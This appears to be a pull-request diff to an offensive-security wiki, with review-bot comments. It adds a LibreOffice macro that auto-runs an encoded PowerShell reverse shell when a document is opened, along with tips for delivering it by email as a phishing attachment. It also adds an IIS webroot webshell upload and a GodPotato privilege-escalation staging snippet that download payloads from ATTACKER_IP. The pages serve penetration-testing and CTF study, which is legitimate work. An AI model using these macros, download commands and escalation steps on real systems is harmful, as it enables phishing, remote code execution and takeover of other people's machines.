Expand Up @@ -83,6 +83,23 @@ Do this because you **can't save macro's inside a `.docx`** and there's a **stig
- [**macphish**](https://github.com/cldrn/macphish)
- [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)

## LibreOffice ODT auto-run macros (Basic)

LibreOffice Writer documents can embed Basic macros and auto-execute them when the file is opened by binding the macro to the **Open Document** event (Tools β†’ Customize β†’ Events β†’ Open Document β†’ Macro…). A simple reverse shell macro looks like:

```vb
Sub Shell
Shell("cmd /c powershell -enc BASE64_PAYLOAD"""")
End Sub
```

Note the doubled quotes (`""`) inside the string – LibreOffice Basic uses them to escape literal quotes, so payloads that end with `...==""")` keep both the inner command and the Shell argument balanced.

Delivery tips:

- Save as `.odt` and bind the macro to the document event so it fires immediately when opened.
- When emailing with `swaks`, use `--attach @resume.odt` (the `@` is required so the file bytes, not the filename string, are sent as the attachment). This is critical when abusing SMTP servers that accept arbitrary `RCPT TO` recipients without validation.

## HTA Files

An HTA is a Windows program that **combines HTML and scripting languages (such as VBScript and JScript)**. It generates the user interface and executes as a "fully trusted" application, without the constraints of a browser's security model.
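Review bot: the quoting in the Basic snippet does not match the explanation that follows it. `Shell("cmd /c powershell -enc BASE64_PAYLOAD"""")` has four consecutive quotes after the payload: in LibreOffice Basic `""` is one escaped literal quote, so the first pair is an escaped quote, the second pair is another, and the string literal is never closed. The note two lines later says a payload should end with `...==""")`, i.e. three quotes (escaped quote, closing quote, paren); make the code block agree with the note, or the reader will copy a macro that does not compile. Two smaller points in the same hunk: naming the procedure `Sub Shell` gives it the same name as the built-in `Shell` function it calls, which invites a name clash and is confusing to read, so a neutral name such as `Sub Main` would be clearer; and the last delivery bullet conflates two unrelated things, since the `@` in `--attach @resume.odt` is ordinary swaks syntax for "read this file as the attachment" and is required no matter how the receiving server handles `RCPT TO`, so the "This is critical when abusing SMTP servers..." sentence should be dropped or reworded as a separate remark.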
Expand Down Expand Up @@ -293,6 +310,7 @@ Check the page about **places to steal NTLM creds**:

## References

- [HTB Job – LibreOffice macro β†’ IIS webshell β†’ GodPotato](https://0xdf.gitlab.io/2026/01/26/htb-job.html)
- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
- [Unit 42 – PhantomVAI Loader Delivers a Range of Infostealers](https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/)
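Review bot: the added reference does not follow the `Source – Title` form used by the other entries in this list (`Check Point Research – ...`, `Unit 42 – ...`, `Hijack the TypeLib – ... (CICADA8)`): it leads with `HTB Job –` and omits the author (0xdf). The same URL is added to two other files in this PR with two more title variants (`0xdf – HTB Job (...)` and `HTB: Job —`), so pick one form, e.g. `0xdf – HTB: Job (LibreOffice macro → IIS webshell → GodPotato)`, and use it in all three places.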
Expand Up @@ -9,6 +9,20 @@ Test executable file extensions:
- config
- php

## Writable webroot β†’ ASPX command shell

If a low-privileged user/group has **write access to `C:\inetpub\wwwroot`**, you can drop an ASPX webshell and execute OS commands as the application pool identity (often holding **SeImpersonatePrivilege**).

- Verify ACLs: `icacls C:\inetpub\wwwroot` or `cacls .` looking for `(F)` on your user/group.
- Upload a command webshell (e.g., fuzzdb/tennc `cmd.aspx`) using PowerShell:

```powershell
iwr http://ATTACKER_IP/shell.aspx -OutFile C:\inetpub\wwwroot\shell.aspx
```

- Request `/shell.aspx` and run commands; identity typically shows `iis apppool\defaultapppool`.
- Combine with Potato-family LPE (e.g., GodPotato/SigmaPotato) when the AppPool token has SeImpersonatePrivilege to pivot to SYSTEM.

## Internal IP Address disclosure

On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:
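Review bot: the ACL check in the first bullet is too narrow. Write access to `C:\inetpub\wwwroot` is also granted by an ACE showing `(M)` (Modify) or `(W)` (Write), not only `(F)`, so the text should say to look for any of those on the relevant principal in the `icacls` output; `cacls` has been deprecated since Windows Vista, so listing it alongside `icacls` adds nothing. The last bullet mentions the Potato family and SeImpersonatePrivilege in prose only; since this file already uses relative links to sibling pages (`../../windows-hardening/av-bypass.md` in the references hunk below), link "Potato-family LPE" to the corresponding page the same way instead of leaving the reader to search for it.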
Expand Down Expand Up @@ -409,6 +423,7 @@ HTTP/1.1 200 OK

## References

- [0xdf – HTB Job (IIS write β†’ ASPX shell β†’ GodPotato)](https://0xdf.gitlab.io/2026/01/26/htb-job.html)
- [Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/)
- [AMSI/ETW bypass background (HackTricks)](../../windows-hardening/av-bypass.md)

Expand Up @@ -160,6 +160,16 @@ EfsPotato <cmd> [pipe]

Notes:
- Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present.
- Grab the binary that matches the installed runtime (e.g., `GodPotato-NET4.exe` on modern Server 2022).
- If your initial execution primitive is a webshell/UI with short timeouts, stage the payload as a script and ask GodPotato to run it instead of a long inline command.

Quick staging pattern from a writable IIS webroot:

```powershell
iwr http://ATTACKER_IP/GodPotato-NET4.exe -OutFile gp.exe
iwr http://ATTACKER_IP/shell.ps1 -OutFile shell.ps1 # contains your revshell
./gp.exe -cmd "powershell -ep bypass C:\inetpub\wwwroot\shell.ps1"
```

### DCOMPotato

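Review bot: the paths in the staging snippet are inconsistent. Both `iwr` calls write to the current directory (`-OutFile gp.exe`, `-OutFile shell.ps1`), but the GodPotato command then references `C:\inetpub\wwwroot\shell.ps1`, which only resolves if the working directory happens to be the webroot; use an absolute `-OutFile` path, or a relative path in the `-cmd` argument, consistently. In the same command, `powershell -ep bypass C:\...\shell.ps1` relies on powershell.exe treating a trailing bare argument as `-Command`; `-File` would state the intent explicitly. Separately, the first note's OS-support claim ("Windows 8/8.1–11 and Server 2012–2022") should cite where it comes from, e.g. the upstream GodPotato README, since the references list for this section does not include it.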
Expand Down Expand Up @@ -201,6 +211,7 @@ SigmaPotato adds modern niceties like in-memory execution via .NET reflection an
- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
- [FullPowers – Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers)
- [HTB: Media β€” WMP NTLM leak β†’ NTFS junction to webroot RCE β†’ FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
- [HTB: Job β€” LibreOffice macro β†’ IIS webshell β†’ GodPotato to SYSTEM](https://0xdf.gitlab.io/2026/01/26/htb-job.html)
- [BeichenDream/PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato)
- [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
